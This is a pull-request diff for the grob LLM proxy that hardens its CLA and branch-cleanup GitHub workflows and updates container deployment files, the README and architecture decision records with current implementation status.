### PR TITLE
feat(routing): add endpoint inventory adapter

### DIFF
--- a/.github/CODEOWNERS
+++ b/.github/CODEOWNERS
@@ -1,0 +1,16 @@
+# Default owner for repository changes.
+* @azerozero
+
+# High-risk operational surfaces.
+/.github/** @azerozero
+/Containerfile @azerozero
+/deploy/** @azerozero
+/scripts/** @azerozero
+/tests/e2e/** @azerozero
+
+# Security-sensitive implementation areas.
+/src/auth/** @azerozero
+/src/features/dlp/** @azerozero
+/src/features/policies/** @azerozero
+/src/security/** @azerozero
+/src/storage/** @azerozero

--- a/.github/workflows/cla.yml
+++ b/.github/workflows/cla.yml
@@ -32,27 +32,40 @@ jobs:
             const SIGNATURES_PATH = 'signatures/cla.json';
             const SIGNATURES_BRANCH = 'cla-signatures';
 
-            // Determine PR number and author.
-            let prNumber, prAuthor;
-            if (context.eventName === 'issue_comment') {
-              // Only react to the magic phrase.
-              if (!context.payload.comment.body.trim().startsWith(CLA_SIGN_TEXT)) return;
-              if (!context.payload.issue.pull_request) return;
-              prNumber = context.payload.issue.number;
-              prAuthor = context.payload.comment.user.login;
-            } else {
-              prNumber = context.payload.pull_request.number;
-              prAuthor = context.payload.pull_request.user.login;
-            }
-
             const owner = context.repo.owner;
             const repo = context.repo.repo;
+
+            // Determine PR number and author. Comment events must sign the PR
+            // author's CLA, not the commenter's, otherwise a third party could
+            // satisfy the status for someone else's contribution.
+            let prNumber, prAuthor, pr;
+            if (context.eventName === 'issue_comment') {
+              if (!context.payload.issue.pull_request) return;
+              const commentBody = context.payload.comment.body.trim();
+              if (commentBody !== CLA_SIGN_TEXT) return;
+
+              prNumber = context.payload.issue.number;
+              pr = (await github.rest.pulls.get({ owner, repo, pull_number: prNumber })).data;
+              prAuthor = pr.user.login;
+              const commenter = context.payload.comment.user.login;
+              if (commenter !== prAuthor) {
+                await github.rest.issues.createComment({
+                  owner, repo, issue_number: prNumber,
+                  body: `Thanks @${commenter}, but only the PR author (@${prAuthor}) can sign the CLA for this pull request.`,
+                });
+                return;
+              }
+            } else {
+              prNumber = context.payload.pull_request.number;
+              pr = context.payload.pull_request;
+              prAuthor = pr.user.login;
+            }
 
             // Check allowlist.
             if (ALLOWLIST.includes(prAuthor)) {
               await github.rest.repos.createCommitStatus({
                 owner, repo,
-                sha: (await github.rest.pulls.get({ owner, repo, pull_number: prNumber })).data.head.sha,
+                sha: pr.head.sha,
                 state: 'success',
                 context: 'CLA',
                 description: 'Allowlisted contributor',
@@ -126,7 +139,6 @@ jobs:
               });
 
               // Set success status.
-              const { data: pr } = await github.rest.pulls.get({ owner, repo, pull_number: prNumber });
               await github.rest.repos.createCommitStatus({
                 owner, repo,
                 sha: pr.head.sha,
@@ -138,7 +150,6 @@ jobs:
             }
 
             // Set status based on signature state.
-            const { data: pr } = await github.rest.pulls.get({ owner, repo, pull_number: prNumber });
             if (hasSigned) {
               await github.rest.repos.createCommitStatus({
                 owner, repo,

--- a/.github/workflows/cleanup-branches.yml
+++ b/.github/workflows/cleanup-branches.yml
@@ -23,9 +23,15 @@ jobs:
         uses: actions/github-script@v7
         with:
           script: |
-            const branch = context.payload.pull_request.head.ref;
-            const protectedPrefixes = ['main'];
-            if (protectedPrefixes.includes(branch)) {
+            const pr = context.payload.pull_request;
+            const branch = pr.head.ref;
+            const protectedNames = new Set(['main', 'master', 'develop', 'release']);
+            const protectedPrefixes = ['release/', 'hotfix/', 'dependabot/'];
+            if (pr.head.repo.full_name !== context.repo.owner + '/' + context.repo.repo) {
+              console.log(`Skipping branch from fork: ${pr.head.repo.full_name}:${branch}`);
+              return;
+            }
+            if (protectedNames.has(branch) || protectedPrefixes.some(prefix => branch.startsWith(prefix))) {
               console.log(`Skipping protected branch: ${branch}`);
               return;
             }
@@ -50,7 +56,8 @@ jobs:
           script: |
             const owner = context.repo.owner;
             const repo = context.repo.repo;
-            const protectedBranches = ['main'];
+            const protectedBranches = ['main', 'master', 'develop', 'release'];
+            const protectedPrefixes = ['release/', 'hotfix/', 'dependabot/'];
             // Patterns for branches that should be auto-cleaned.
             const stalePatterns = [/^release-plz-/, /^claude\//];
 
@@ -61,17 +68,18 @@ jobs:
             let deleted = 0;
             for (const branch of branches) {
               if (protectedBranches.includes(branch.name)) continue;
+              if (protectedPrefixes.some(prefix => branch.name.startsWith(prefix))) continue;
               if (!stalePatterns.some(p => p.test(branch.name))) continue;
 
               // Only delete if fully merged into main.
               try {
-                const { status } = await github.rest.repos.compareCommits({
+                const { data: comparison } = await github.rest.repos.compareCommits({
                   owner, repo,
                   base: 'main',
                   head: branch.name,
                 });
                 // ahead_by == 0 means all commits are in main.
-                if (status !== 'behind' && status !== 'identical') continue;
+                if (comparison.ahead_by !== 0) continue;
               } catch {
                 continue;
               }

--- a/.github/workflows/semgrep.yml
+++ b/.github/workflows/semgrep.yml
@@ -21,8 +21,9 @@ jobs:
   semgrep:
     name: Semgrep Rust SAST
     runs-on: ubuntu-latest
+    timeout-minutes: 15
     container:
-      image: semgrep/semgrep
+      image: semgrep/semgrep:1.144.0
 
     steps:
       - uses: actions/checkout@v6

--- a/CONTRACTS.md
+++ b/CONTRACTS.md
@@ -14,10 +14,10 @@
 ## dispatch(ctx, request)
 
 **Module:** `src/server/dispatch/mod.rs`
-**Intention:** Execute the full request pipeline in a strict, ordered sequence: grob_hint harvesting (Step 0, header/MCP hint), DLP input scan, MCP tool calibration, pledge filtering, cache lookup, routing, provider mapping resolution (including Step 5.5 tier fan-out when a `[[tiers]]` matches), tool layer processing, cache hit check, fan-out (if configured), and finally the provider fallback loop. Returns either a streaming or complete response.
+**Intention:** Execute the full request pipeline in a strict, ordered sequence: grob_hint harvesting (Step 0: header/body/MCP hint), DLP input scan, tool-call spike guard, MCP tool calibration, pledge filtering, cache-key computation (salted with grob_hint when present), routing, grob_hint tier override, provider mapping resolution, tool layer processing, cache hit check, tier/model fan-out (if configured), and finally the provider fallback loop. Returns either a streaming or complete response.
 
 **Invariants:**
-- INV-1 (Pipeline order): Steps must execute in the documented order (Step 0 grob_hint -> DLP -> MCP -> pledge -> cache key -> route -> resolve mappings (+ Step 5.5 tier fan-out) -> tool layer -> cache hit -> fan-out -> provider loop). No step may be skipped except when gated by feature flags.
+- INV-1 (Pipeline order): Steps must execute in the documented order (Step 0 grob_hint -> DLP -> tool-spike guard -> MCP -> pledge -> cache key -> route -> grob_hint tier override -> resolve mappings -> tool layer -> cache hit -> tier/model fan-out -> provider loop). No step may be skipped except when gated by feature flags.
 - INV-2 (DLP before provider): DLP input scanning must always complete before any data is sent to an external provider. A DLP block must prevent the request from reaching any provider.
 - INV-3 (Fallback exhaustion): The provider loop must try all available mappings in order before returning an error. Circuit-broken providers are skipped, not retried.
 - INV-4 (Atomic routing): The routing decision is computed once and used for all provider attempts within a single dispatch. Re-routing mid-dispatch is not allowed.
@@ -28,12 +28,12 @@
 
 **Postconditions:**
 - On success: returns `DispatchResult` (Streaming, Complete, or FanOut)
-- On failure: returns `AppError` with a specific error variant
+- On failure: returns `RequestError` with a specific error variant
 - DLP events are emitted for every DLP action taken
 - Spend is recorded after a successful provider response. For **complete** responses this happens inline after the provider returns; for **streaming** responses the `SpendStream` wrapper records on stream termination (see `SpendStream::poll_next` below). Both paths record against the same tenant and routed model name.
 
 **Boundary behavior:**
-- No providers available: returns `AppError` (after exhausting all fallbacks)
+- No providers available: returns `RequestError` (after exhausting all fallbacks)
 - DLP blocks request: returns error before any provider is contacted
 - Cache hit on non-streaming: returns immediately without contacting provider
 
@@ -50,10 +50,10 @@
 ## Router::route(request)
 
 **Module:** `src/routing/classify/mod.rs`
-**Intention:** Classify an incoming request into a route type and resolve the target model name by evaluating rules in strict priority order: `grob_hint` header/MCP (Step 0) > WebSearch > Background > AutoMap > SubagentTag > PromptRules > Think > ComplexityTier (T-P1 classifier) > Default. Note: SubagentTag extracts a model from `<GROB-SUBAGENT-MODEL>` system prompt tags but returns `RouteType::Default` (no dedicated variant). The `complexity_tier` field on `RouteDecision` is populated when the stateless classifier matches, and feeds the tier fan-out layer downstream (Step 5.5 in `dispatch`).
+**Intention:** Classify an incoming request into a route type and resolve the target model name by evaluating rules in strict priority order: WebSearch > Background > AutoMap > SubagentTag > PromptRules > Think > ComplexityTier (T-P1 classifier) > Default. Note: SubagentTag extracts a model from `<GROB-SUBAGENT-MODEL>` system prompt tags but returns `RouteType::Default` (no dedicated variant). The `complexity_tier` field on `RouteDecision` is populated when the stateless classifier matches, then `dispatch` may override that tier from `grob_hint` before tier fan-out.
 
 **Invariants:**
-- INV-1 (Priority order): A higher-priority rule always wins. If a request matches both WebSearch and Think, WebSearch is returned. An explicit `grob_hint` always short-circuits classification.
+- INV-1 (Priority order): A higher-priority rule always wins. If a request matches both WebSearch and Think, WebSearch is returned. `grob_hint` is not evaluated inside `Router::route`; it is resolved in `dispatch` and overrides only the final `complexity_tier` after routing.
 - INV-2 (Determinism): Given the same request and config, `route()` always returns the same `RouteDecision`.
 - INV-3 (Auto-map mutation): Auto-mapping mutates `request.model` in place. This mutation must only happen if no higher-priority rule matched, and must happen before prompt-rule evaluation.
 - INV-4 (Single match): Exactly one route type is returned per call. The function never returns multiple matches.
@@ -96,6 +96,8 @@
 
 **Postconditions:**
 - Returns `Ok(CanonicalRequest)` with all messages converted
+- Preserves internal `metadata.grob_hint` until dispatch harvesting, while dropping unrelated client metadata before provider forwarding
+- Preserves OpenAI system/user/assistant message `name` fields in non-serialized request extensions for OpenAI provider roundtrips
 - Unsupported roles are skipped with a warning log
 
 **Boundary behavior:**
@@ -107,7 +109,7 @@
 - (none recorded yet)
 
 **Red flags to detect:**
-- New OpenAI field not mapped to canonical (silently dropped)
+- New OpenAI field not mapped to canonical or request extensions (silently dropped)
 - Tool message merge logic that breaks on non-consecutive tool messages
 - `unwrap()` on optional fields instead of graceful fallback
 

--- a/Containerfile
+++ b/Containerfile
@@ -25,8 +25,9 @@ RUN cargo chef cook --release --locked --target x86_64-unknown-linux-musl --reci
 COPY . .
 RUN cargo build --release --locked --target x86_64-unknown-linux-musl
 
-# Strip symbols for smaller binary
-RUN strip target/x86_64-unknown-linux-musl/release/grob
+# Strip symbols for smaller binary and create runtime-owned mount points.
+RUN strip target/x86_64-unknown-linux-musl/release/grob && \
+    mkdir -p /runtime/var/lib/grob /runtime/tmp
 
 # Stage 3: Runtime (scratch - empty base)
 FROM scratch
@@ -40,8 +41,10 @@ LABEL org.opencontainers.image.licenses="AGPL-3.0"
 # Copy CA certificates for TLS (from builder)
 COPY --from=builder /etc/ssl/certs/ca-certificates.crt /etc/ssl/certs/
 
-# Copy binary
+# Copy binary and create writable mount points owned by the runtime UID.
 COPY --from=builder /usr/src/grob/target/x86_64-unknown-linux-musl/release/grob /grob
+COPY --from=builder --chown=65534:65534 /runtime/var/lib/grob /var/lib/grob
+COPY --from=builder --chown=65534:65534 /runtime/tmp /tmp
 
 # Create non-root user (65534 = nobody)
 USER 65534:65534

--- a/README.md
+++ b/README.md
@@ -59,11 +59,11 @@ curl -fsSL https://raw.githubusercontent.com/azerozero/grob/main/scripts/install
 
 Then:
 ```bash
-grob setup        # interactive wizard — picks providers + auth
+grob setup        # writes ~/.grob/config.toml (override with GROB_CONFIG or --config)
 grob exec -- claude
 ```
 
-That's it. Grob auto-starts, routes traffic, and stops when your tool exits.
+That's it. Grob auto-starts, routes traffic, and stops when your tool exits. To check a long-running instance, run `grob status` or `curl http://[::1]:13456/health`.
 
 ## DLP -- secrets never reach the provider
 
@@ -272,6 +272,7 @@ grob watch                Live traffic inspector (TUI dashboard)
 grob status               Service status + spend summary
 grob spend                Monthly spend breakdown
 grob key create/list/revoke  Manage virtual API keys
+grob secrets add/list/test    Manage encrypted upstream secrets
 grob validate             Test all providers with real API calls
 grob doctor               Run diagnostic checks
 grob preset list/apply    Manage presets
@@ -280,11 +281,19 @@ grob connect [provider]   Set up credentials interactively
 
 ## Container
 
+The image listens on container port `8080` and supports the same config path contract as the binary:
+
 ```bash
-docker run -e ANTHROPIC_API_KEY=sk-... ghcr.io/azerozero/grob:latest
+docker volume create grob-data
+docker run --rm -p 8080:8080 \
+  -v "$HOME/.grob/config.toml:/etc/grob/config.toml:ro" \
+  -v grob-data:/var/lib/grob \
+  -e GROB_CONFIG=/etc/grob/config.toml \
+  -e GROB_HOME=/var/lib/grob \
+  ghcr.io/azerozero/grob:latest
 ```
 
-6 MB image, `FROM scratch`, TLS bundled via rustls. No OS layer needed.
+Use `-p 13456:8080` if you want the native host default on the outside. 6 MB image, `FROM scratch`, TLS bundled via rustls. No OS layer needed.
 
 ## Project structure
 
@@ -314,8 +323,7 @@ src/
 │   ├── harness/         Record & replay sandwich testing
 │   ├── tool_layer/      Tool-calling abstraction layer
 │   ├── pledge/          Pledge-based capability restrictions
-│   ├── watch/           TUI dashboard (grob watch)
-│   ├── log_backend/     Structured audit log backend
+│   ├── watch/           TUI dashboard and live traffic inspector support
 │   └── log_export/      Encrypted audit log export
 ├── shared/              Cross-cutting modules (not tied to a single slice)
 │   ├── acme.rs          Automatic TLS certificate provisioning via ACME

--- a/deploy/docker-compose.yml
+++ b/deploy/docker-compose.yml
@@ -15,9 +15,10 @@ services:
       context: ..
       dockerfile: Containerfile
 
-    # Default grob port is 13456 (IPv6 ::1 on host, 0.0.0.0 in container).
+    # Container mode listens on 8080. Set GROB_HOST_PORT=13456 if you
+    # want the native host default on the outside.
     ports:
-      - "13456:13456"
+      - "${GROB_HOST_PORT:-8080}:8080"
 
     # ── Security hardening ──
     read_only: true
@@ -26,8 +27,6 @@ services:
       - seccomp=seccomp.json
     cap_drop:
       - ALL
-    cap_add:
-      - NET_BIND_SERVICE    # Only if binding to port < 1024
     user: "65534:65534"
 
     # Writable scratch space (noexec for defense-in-depth)
@@ -35,13 +34,13 @@ services:
       - /tmp:noexec,nosuid,size=64m
 
     volumes:
-      # Config (read-only bind mount)
-      - ${GROB_CONFIG:-${HOME}/.grob/config}:/etc/grob:ro
+      # Config directory on the host (read-only bind mount)
+      - ${GROB_CONFIG_DIR:-${HOME}/.grob/config}:/etc/grob:ro
       # Persistent data (spend DB, encryption keys)
       - grob-data:/var/lib/grob
 
     environment:
-      - GROB_CONFIG_PATH=/etc/grob/config.toml
+      - GROB_CONFIG=/etc/grob/config.toml
       - GROB_HOME=/var/lib/grob
       - RUST_LOG=info
 

--- a/deploy/grob-kube.yml
+++ b/deploy/grob-kube.yml
@@ -1,7 +1,9 @@
 # grob-kube.yml
 # Podman play kube compatible manifest for Grob LLM Proxy
-# Usage: podman play kube grob-kube.yml
-# Rootless: podman play kube --userns=keep-id grob-kube.yml
+# Usage: podman play kube deploy/grob-kube.yml
+# Rootless: podman play kube --userns=keep-id deploy/grob-kube.yml
+# Before using hostPath volumes, replace /var/lib/grob/* with absolute host paths.
+# Pre-create them and chown to UID/GID 65534; Kubernetes does not expand `~`.
 
 apiVersion: v1
 kind: Pod
@@ -10,11 +12,12 @@ metadata:
   labels:
     app: grob
 spec:
-  # Security context for rootless operation
+  # Security context matches the scratch image user (65534 = nobody). Pre-create
+  # hostPath directories and chown them to 65534 before running this manifest.
   securityContext:
-    runAsUser: 1000
-    runAsGroup: 1000
-    fsGroup: 1000
+    runAsUser: 65534
+    runAsGroup: 65534
+    fsGroup: 65534
     seccompProfile:
       type: RuntimeDefault
 
@@ -48,9 +51,9 @@ spec:
           cpu: "1000m"
 
       env:
-        - name: GROB_CONFIG_PATH
+        - name: GROB_CONFIG
           value: "/etc/grob/config.toml"
-        - name: GROB_DATA_DIR
+        - name: GROB_HOME
           value: "/var/lib/grob"
         - name: RUST_LOG
           value: "info"
@@ -101,21 +104,21 @@ spec:
         failureThreshold: 30
 
   volumes:
-    # Config from host (SELinux :Z for private unshared)
+    # Config from host. Replace with an absolute host path; `~` is not expanded.
     - name: config
       hostPath:
-        path: ~/.grob/config
-        type: DirectoryOrCreate
-    # Data directory
+        path: /var/lib/grob/config
+        type: Directory
+    # Data directory. Ensure UID/GID 65534 can write here.
     - name: data
       hostPath:
-        path: ~/.grob/data
-        type: DirectoryOrCreate
-    # Audit log directory (persistent)
+        path: /var/lib/grob/data
+        type: Directory
+    # Audit log directory (persistent). Ensure UID/GID 65534 can write here.
     - name: audit
       hostPath:
-        path: ~/.grob/audit
-        type: DirectoryOrCreate
+        path: /var/lib/grob/audit
+        type: Directory
     # Ephemeral tmp
     - name: tmp
       emptyDir: {}

--- a/deploy/grob.container
+++ b/deploy/grob.container
@@ -1,6 +1,6 @@
 # grob.container
 # Quadlet systemd container unit for rootless Podman
-# Install: cp grob.container ~/.config/containers/systemd/
+# Install: cp deploy/grob.container deploy/grob.volume ~/.config/containers/systemd/
 # Enable: systemctl --user daemon-reload && systemctl --user enable --now grob
 
 [Unit]
@@ -18,29 +18,29 @@ Pull=never
 PublishPort=8080:8080
 PublishPort=9090:9090
 
-# User/Group (rootless)
-User=1000
-Group=1000
+# User/Group matches the scratch image user (65534 = nobody). The data bind
+# mount below uses :U so rootless Podman makes it writable for this UID.
+User=65534
+Group=65534
 
 # Security options
 NoNewPrivileges=true
 DropCapabilities=ALL
-AddCapability=NET_BIND_SERVICE
 SecurityLabelType=container_runtime_t
 ReadOnly=true
 
 # Environment
 Environment=RUST_LOG=info
-Environment=GROB_CONFIG_PATH=/etc/grob/config.toml
-Environment=GROB_DATA_DIR=/var/lib/grob
+Environment=GROB_CONFIG=/etc/grob/config.toml
+Environment=GROB_HOME=/var/lib/grob
 
 # Volumes (host:container)
 Volume=%h/.grob/config:/etc/grob:ro,Z
-Volume=%h/.grob/data:/var/lib/grob:Z
+Volume=%h/.grob/data:/var/lib/grob:Z,U
 Volume=grob-tmp:/tmp
 
 # Health check
-HealthCmd=/grob status --format json
+HealthCmd=/grob status
 HealthInterval=30s
 HealthTimeout=5s
 HealthStartPeriod=5s

--- a/docs/README.md
+++ b/docs/README.md
@@ -20,6 +20,7 @@ Start here: **[Documentation Index](index.md)**
 - [Configure the SimHash Cache](how-to/configure-simhash-cache.md) -- Fuzzy response cache setup
 - [Use grob_hint](how-to/use-grob-hint.md) -- Override request complexity per call
 - [Troubleshooting](how-to/troubleshooting.md) -- Common errors and fixes
+- [Gemini Integration](how-to/gemini-integration.md) -- Gemini and Vertex AI setup specifics
 
 ## Reference (information-oriented)
 
@@ -36,7 +37,6 @@ Start here: **[Documentation Index](index.md)**
 - [Architecture](explanation/architecture.md) -- Request flow, module layout, design decisions
 - [Design Principles](explanation/design-principles.md) -- Philosophy and UX guidelines
 - [Security Model](explanation/security.md) -- Threat model, defense layers, TLS
-- [Gemini Integration](how-to/gemini-integration.md) -- Gemini and Vertex AI specifics
 - [Architecture Decision Records](decisions/) -- ADRs for key design choices
 
 ## Monitoring

--- a/docs/decisions/0011-control-engine-mcp-tools.md
+++ b/docs/decisions/0011-control-engine-mcp-tools.md
@@ -6,6 +6,15 @@ consulted: []
 informed: []
 ---
 
+> **Implementation status (2026-06-02)**: the `ControlEngine` action model is
+> present in `src/control/engine.rs`, but the JSON-RPC surface is **not frozen**
+> to `server`, `model`, `provider`, and `budget`. The current tree also exposes
+> `grob/keys/*`, `grob/config/*`, `grob/tools/*`, `grob/hit/*`, and
+> `grob/pledge/*` through `src/server/rpc/`, and MCP control tools bridge back
+> to those RPC namespaces via `src/server/mcp_handlers/control_bridge.rs`.
+> Treat the "MCP-tools-first / frozen RPC" sections below as the target
+> direction, not as the delivered contract.
+
 # ADR-0011: ControlEngine Generic + MCP-Tools-First Configuration Surface
 
 ## Context and Problem Statement
@@ -31,7 +40,7 @@ This duplication has already caused drift:
 
 - **Single source of behavior** — one module decides what each action does; the surfaces are thin adapters.
 - **Testable in isolation** — the engine must be a pure function `(state, action) -> (new_state, effects)` with no I/O, so it can be property-tested and fuzzed.
-- **MCP-tools-first** — instead of extending the JSON-RPC namespace map indefinitely, new control surfaces are exposed as MCP tools. The JSON-RPC namespaces stay frozen at v1.
+- **MCP-tools-first target** — instead of extending the JSON-RPC namespace map indefinitely, new control surfaces should be exposed as MCP tools. The current implementation still uses JSON-RPC as the shared control backend for both RPC clients and MCP wrappers.
 - **Surface parity by construction** — adding an action to the engine automatically makes it reachable from all surfaces once each adapter routes the new action variant.
 - **No extension of JSON-RPC** — deliberately constrain the RPC namespace surface area. MCP covers the growth path.
 
@@ -66,9 +75,13 @@ This duplication has already caused drift:
 - **MCP adapter** (`src/features/mcp/`) — exposes the action variants as MCP tools (`wizard_setup_start`, `wizard_select_preset`, `grob_configure`, …). The MCP surface grows with the engine, not with the JSON-RPC namespace map.
 - **UI adapter** (future, B-1) — HTML + SSE + JWT embedded via `rust-embed`, consuming the same engine.
 
-### JSON-RPC namespaces: frozen
+### JSON-RPC namespaces: target freeze, current divergence
 
-The four v0.31 namespaces (`server`, `model`, `provider`, `budget`) remain. No new namespace will be added. The five namespaces originally planned in rescue ADR-001 (`keys`, `config`, `tools`, `hit`, `pledge`) are **not** implemented as RPC — they become MCP tools instead.
+Target contract: the four v0.31 namespaces (`server`, `model`, `provider`, `budget`) remain, and future growth goes through MCP tools rather than new raw RPC namespaces.
+
+Current code diverges from that target. `keys`, `config`, `tools`, `hit`, and `pledge` are implemented as JSON-RPC namespaces and MCP tool calls are thin wrappers over the same RPC dispatcher. This is pragmatic for shared auth, state reload, and tests, but it means this ADR must not be read as evidence that those namespaces are absent.
+
+Open product question: prototype a separate MCP proxy (stdio/http relay to an upstream such as `codex_apps`, in an isolated worktree), or keep Grob as the MCP server for its own control-plane only.
 
 ### Migration order
 
@@ -105,4 +118,4 @@ Sequenced: A-1 blocks A-2 / A-3 / B-1 (structural refactor, conflict risk).
 - [ADR-0009](0009-pledge-structural-tool-filtering.md), [ADR-0010](0010-universal-tool-layer.md) — modules that the engine orchestrates.
 - [ADR-0013](0013-storage-files-no-redb.md) — engine state persistence lands on the files backend.
 - Chantiers: A-1 (engine), A-2 (CLI thin), A-3 (MCP wizard extend) in the sprint menu.
-- Current code: `src/server/rpc/` (JSON-RPC namespaces), `src/features/mcp/` (MCP tools including `grob_configure` from PR #100).
+- Current code: `src/control/engine.rs` (action parsing/roles), `src/server/rpc/` (JSON-RPC namespaces), `src/server/mcp_handlers/control_bridge.rs` (MCP-to-RPC bridge), `src/features/mcp/` (MCP tool matrix and tooling).

--- a/docs/decisions/0013-storage-files-no-redb.md
+++ b/docs/decisions/0013-storage-files-no-redb.md
@@ -6,12 +6,13 @@ consulted: []
 informed: []
 ---
 
-> **Status note (2026-04-28)**: status reverted from `done` to `accepted`.
-> redb persistence remains the active storage substrate in v0.36.x — `GrobStore`
-> in `src/storage/mod.rs` is still the live code path and `~/.grob/spend/*.jsonl`
-> has not yet been written. The A-7 storage refactor is deferred to v0.37+.
-> The decision recorded here remains binding; only the implementation flag has
-> been corrected to reflect that no production code matches the design yet.
+> **Implementation status (2026-06-02)**: the file-based storage substrate is
+> now the live code path. `src/storage/mod.rs` opens `GrobStore` on atomic files
+> and append-only JSONL journals, `src/storage/journal.rs` writes
+> `~/.grob/spend/YYYY-MM.jsonl`, and OAuth / virtual-key records are stored as
+> AES-256-GCM encrypted `*.json.enc` files. Legacy `grob.db` is detected and
+> warned about, but not migrated. The storage-cap / stdout-saturation fallback
+> described below remains target design, not current code.
 
 # ADR-0013: Storage on Atomic Files + Append-Only Journal — No redb
 
@@ -56,8 +57,8 @@ Decision D-03 of the 2026-04-08 architect brief explicitly said: "Storage = atom
 │   ├── 2026-03.jsonl.sealed     # prior month, sealed (one kept per D-04)
 │   └── index.json               # metadata + sealed-file hashes
 ├── tokens/
-│   ├── anthropic.json.age       # age-encrypted
-│   └── openai.json.age
+│   ├── anthropic.json.enc       # AES-256-GCM encrypted
+│   └── openai.json.enc
 ├── config/
 │   ├── grob.toml
 │   └── presets/
@@ -84,7 +85,7 @@ Invariants:
 
 Only the **current month** and **one sealed previous month** are kept unless `[compliance] retention_months > 1` is set. LRU purge deletes older sealed files first (never the current month).
 
-### Storage cap (D-09)
+### Storage cap (D-09, not yet implemented)
 
 `[compliance] max_storage_mb = 50` is the default. When `~/.grob/spend/` exceeds the cap:
 
@@ -134,6 +135,6 @@ Existing redb users lose their state on upgrade. This is acceptable because:
 
 - Linked chantier: **A-7 Storage refactor files**, blocked on validation pause after W-1..W-4 merges.
 - [ADR-0004](0004-persistent-spend-tracking.md) — superseded in spirit (same goal, different substrate). A cross-reference will be added there once A-7 lands.
-- [ADR-0017](0017-sokolsky-log-backend.md) — the production audit path writes to Sokolsky; the local `audit/*.jsonl` file is a fallback for dev.
+- [ADR-0017](0017-sokolsky-log-backend.md) — Sokolsky remains a target backend; the current implementation has local signed audit logs and structured log export, not a `src/features/log_backend/` Sokolsky writer.
 - Obsidian concept: `50 - Concepts/Storage Files Biomimetique.md`.
 - Architect decisions: D-03, D-04, D-09.

--- a/docs/decisions/0015-indirect-prompt-injection-coverage.md
+++ b/docs/decisions/0015-indirect-prompt-injection-coverage.md
@@ -6,12 +6,13 @@ consulted: []
 informed: []
 ---
 
-> **Status note (2026-04-28)**: status reverted from `done` to `accepted`.
-> A-6 (indirect prompt injection coverage) implementation is deferred — no
-> production code merges yet. The framework design described here is final and
-> binding for the next implementation pass; only the implementation flag has
-> been corrected to reflect that the symmetric output-side scan is not yet wired
-> into the dispatch pipeline.
+> **Implementation status (2026-06-02)**: response-side and `tool_result`
+> indirect-injection scanning are implemented in `src/features/dlp/` and wired
+> into the dispatch pipeline. The active config is
+> `[dlp.prompt_injection] scan_responses`, `scan_tool_results`, and
+> `response_action`. The DecisionToken/Sokolsky emission described below has
+> not landed; detections currently surface through DLP reports, logs, blocking
+> errors, and the existing DLP telemetry path.
 
 # ADR-0015: Indirect Prompt Injection Coverage — Scan Responses and `tool_result` Blocks
 
@@ -76,14 +77,12 @@ Both scans run **before** the LLM is allowed to interpret the content. For a mul
 ### Configuration
 
 ```toml
-[dlp.injection_output]
+[dlp.prompt_injection]
 enabled = true
-action = "warn"          # warn | block | ignore
-scan_tool_results = true
+action = "warn"                 # request-side action
 scan_responses = true
-
-[dlp.injection_output.thresholds]
-# optional: fine-grained per-pattern actions
+scan_tool_results = true
+response_action = "warn"        # response/tool_result action
 ```
 
 Defaults:
@@ -119,7 +118,9 @@ The injection pattern set is a bounded DFA. Scanning a 10 KB response takes < 1 
 
 ### Audit trail
 
-Each scan emits a `DecisionToken` ([ADR-0016](0016-decision-tokens-transparent-routing.md)) with `reason_code = "injection_output"` or `reason_code = "injection_tool_result"`. These tokens are routed to the Sokolsky audit plane ([ADR-0017](0017-sokolsky-log-backend.md)) and are **not** visible to the boss or the agent.
+Target state: each scan emits a `DecisionToken` ([ADR-0016](0016-decision-tokens-transparent-routing.md)) with `reason_code = "injection_output"` or `reason_code = "injection_tool_result"`. These tokens are routed to the audit plane ([ADR-0017](0017-sokolsky-log-backend.md)) and are **not** visible to the boss or the agent.
+
+Current state: response and `tool_result` detections emit DLP action reports/logs and can block the response when `response_action = "block"`, but they do not yet produce DecisionToken records.
 
 ## Consequences
 
@@ -144,7 +145,7 @@ Each scan emits a `DecisionToken` ([ADR-0016](0016-decision-tokens-transparent-r
 
 ## Follow-ups and related ADRs
 
-- Chantier: **A-6 Indirect injection coverage**, `feat/dlp-indirect-injection`. Deferred until after the wizard-UX-fixes and validation pause.
+- Chantier: **A-6 Indirect injection coverage** — scanning is implemented; DecisionToken/audit-plane emission remains the follow-up.
 - [ADR-0009](0009-pledge-structural-tool-filtering.md) — Pledge removes dangerous tools; this ADR scans content returned by tools that are kept.
 - [ADR-0010](0010-universal-tool-layer.md) — the Tool Layer is where tools are managed; this ADR is where their outputs are inspected.
 - [ADR-0016](0016-decision-tokens-transparent-routing.md) — audit trail for each detection.

--- a/docs/decisions/0017-sokolsky-log-backend.md
+++ b/docs/decisions/0017-sokolsky-log-backend.md
@@ -8,6 +8,10 @@ informed: []
 
 # ADR-0017: Sokolsky LogBackend — Cross-Plane Audit with N-of-N Signatures
 
+## Implementation status
+
+This ADR records the Sokolsky target architecture. The current tree does not ship a `src/features/log_backend/` module; the implemented audit surface is the signed local audit log in `src/security/audit_log.rs` plus encrypted export support in `src/features/log_export/`. Treat the Sokolsky paths below as proposed target paths until a follow-up implementation ADR or PR restores them.
+
 ## Context and Problem Statement
 
 Grob's audit trail must satisfy three requirements that are in tension:

--- a/docs/decisions/0018-nature-inspired-routing.md
+++ b/docs/decisions/0018-nature-inspired-routing.md
@@ -16,6 +16,14 @@ informed: []
 > parent. ADR-0021 (Thompson sampling) was rejected before drafting because
 > probabilistic exploration is incompatible with both audiences' demands for
 > predictable routing.
+>
+> **Implementation status (2026-06-02)**: passive circuit breaker and active
+> health-check modules exist in `src/routing/`; adaptive scoring is implemented
+> as a provider-level v1 scorer under `[security] adaptive_scoring` (ADR-0019).
+> Hedging remains proposed, and `[[endpoints]]` / `[[policies]]` are not public
+> `AppConfig` fields. A read-only internal endpoint adapter exists in
+> `src/routing/endpoints.rs` for ADR-0022 phase 0. Thompson sampling remains
+> rejected/deferred; it is not a shipped or planned near-term routing primitive.
 
 # ADR-0018: Nature-Inspired Routing — Topology vs Policy, Caddy-KISS, Biomimetic Primitives
 
@@ -48,34 +56,34 @@ Grob's positioning includes a "bio-inspired" thread ([Sécurité Bio-inspirée](
 | Active health probing with cooldown + half-open | Half-open circuit breaker | Immune response — test an antigen with a few cells before full recommitment |
 | EMA of success-rate / latency per endpoint | Exponential moving average | Ant stigmergy — pheromone trails evaporate, good paths get reinforced |
 | Hedged requests on p95 latency | Google "Tail at Scale" (2013) | Fish shoaling — redundant swimmers for resilience |
-| Weighted bandit with Thompson sampling | Multi-armed bandit exploration | Scout bees — ε-greedy exploration of unknown sources |
+| Weighted bandit with Thompson sampling | Deferred / rejected for now | Scout-bee analogy kept as rejected design context only |
 
